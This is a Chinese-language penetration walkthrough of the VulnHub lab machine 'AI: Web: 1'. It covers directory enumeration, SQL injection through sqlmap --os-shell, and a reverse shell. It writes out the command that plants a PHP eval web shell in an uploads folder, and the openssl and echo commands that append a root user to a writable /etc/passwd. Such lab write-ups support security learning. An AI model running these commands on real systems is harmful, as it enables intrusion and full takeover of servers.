渗透复现

（1）目录扫描爆破出隐藏页面info.php和传参页面，泄露网站绝对路径并且存在SQL注入点

（2）已知网站绝对路径，存在SQL注入点，尝试OS-shell写入

（3）OS-shell写入后进行反弹shell，获取3W的shell后进行信息收集发现/etc/passwd的属主是3W

（4）Openssl生成密码，在/etc/passwd文件中直接写入root用户

知识扩展

OS-shell,Openssl的利用

Linux /etc/passwd文件写入root用户进行提权

靶机地址

AI: Web: 1 ~ VulnHub

主机发现

（1）攻击机

192.168.88.128

（2）目标主机

192.168.88.139

信息收集

端口扫描

端口访问

目录扫描

目录爆破

目录访问

（1）/robots.txt

（2）/m3diNf0/

（3）/se3reTdir777/uploads/

（4）/se3reTdir777/

实施攻击

（1）/m3diNf0/目录进行扫描和爆破

（2）访问/m3diNf0/info.php，发现网站的绝对路径

（3）前面收集到的/se3reTdir777/页面存在传参点，BP抓包，进行注入测试

（4）已知网站绝对路径，尝试进行os-shell的写入

#将数据包内容保存至1.txt文件中
sqlmap -r 1.txt --level=3 --os-shell

（5）os-shell的写入需要目录有写入权限

#结合获取的网站根路径和已知路径，进行os-shell写入尝试
/home/www/html/web1x443290o2sdf92213/m3diNf0/
/home/www/html/web1x443290o2sdf92213/se3reTdir777/
/home/www/html/web1x443290o2sdf92213/se3reTdir777/uploads/

（6）利用os-shell在upload目录下写shell

echo '<?php eval($_POST[123]);?>' > /home/www/html/web1x443290o2sdf92213/se3reTdir777/uploads/shell.php

（7）蚁剑连接，这里需要相对路径访问，绝对路径无法访问

提权

（1）反弹shell

（2）信息收集

（3）/etc/passwd属主为3W，具备可读可写权，直接在/etc/pass写入root权限用户

openssl passwd -1 -salt yeah 123
echo 'yeah:$1$yeah$DESxTjElMCcWPYD62gkyC1:0:0::/root:/bin/bash' >> /etc/passwd